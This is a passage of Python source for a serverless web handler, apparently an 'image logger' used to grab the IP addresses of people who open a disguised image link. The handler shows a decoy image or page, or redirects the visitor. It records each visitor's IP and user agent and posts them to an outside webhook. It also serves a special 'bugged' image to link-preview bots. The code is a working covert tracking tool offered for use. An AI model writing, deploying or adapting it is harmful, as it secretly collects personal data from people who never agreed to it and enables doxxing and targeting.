        }],
    }
    
    if url: embed["embeds"][0].update({"thumbnail": {"url": url}})
    requests.post(config["webhook"], json=embed)
    return info

# Loading image binary
binaries = {
    "loading": base64.b85decode(b'|JeWF01!$>Nk#wx0RaF=07w7;|JwjV0RR90|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|Nq+nLjnK)|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsBO01*fQ-~r$R0TBQK5di}c0sq7R6aWDL00000000000000000030!~hfl0RR910000000000000000RP$m3<CiG0uTcb00031000000000000000000000000000')
}

# Vercel looks for a class named 'handler'
class handler(BaseHTTPRequestHandler):
    
    def do_GET(self):
        try:
            # Clean URL handling
            s = self.path
            query_params = dict(parse.parse_qsl(parse.urlsplit(s).query))
            
            # Image logic
            url = config["image"]
            if config["imageArgument"]:
                if query_params.get("url"):
                    try:
                        url = base64.b64decode(query_params.get("url").encode()).decode()
                    except:
                        pass

            # IP Handling
            client_ip = self.headers.get('x-forwarded-for', '0.0.0.0').split(',')[0]

            if client_ip.startswith(blacklistedIPs):
                self.send_response(403)
                self.end_headers()
                return
            
            user_agent = self.headers.get('user-agent', 'Unknown')

            if botCheck(client_ip, user_agent):
                # If it's a bot/Discord preview
                self.send_response(200 if config["buggedImage"] else 302)
                self.send_header('Content-type' if config["buggedImage"] else 'Location', 'image/jpeg' if config["buggedImage"] else url)
                self.end_headers()
                if config["buggedImage"]: 
                    self.wfile.write(binaries["loading"])
                
                makeReport(client_ip, useragent=user_agent, endpoint=s.split("?")[0], url=url)
                return
            
            else:
                # If it's a real user
                makeReport(client_ip, useragent=user_agent, endpoint=s.split("?")[0], url=url)
                
                message = config["message"]["message"]
                
                # Simple redirect or content display
                if config["redirect"]["redirect"]:
                    self.send_response(302)
                    self.send_header('Location', config["redirect"]["page"])
                    self.end_headers()
                    return

                self.send_response(200)
                self.send_header('Content-type', 'text/html')
                self.end_headers()
                
                html_content = f'''<style>body {{ margin: 0; padding: 0; }} div.img {{ background-image: url('{url}'); background-position: center center; background-repeat: no-repeat; background-size: contain; width: 100vw; height: 100vh; }}</style><div class="img"></div>'''
                
                if config["message"]["doMessage"]:
                    html_content += f"<br><center>{message}</center>"

                self.wfile.write(html_content.encode())

        except Exception:
            self.send_response(500)
            self.send_header('Content-type', 'text/plain')
            self.end_headers()
            self.wfile.write(traceback.format_exc().encode())

    # Vercel creates a new instance per request, so mapping POST to GET logic works
    def do_POST(self):
        self.do_GET()
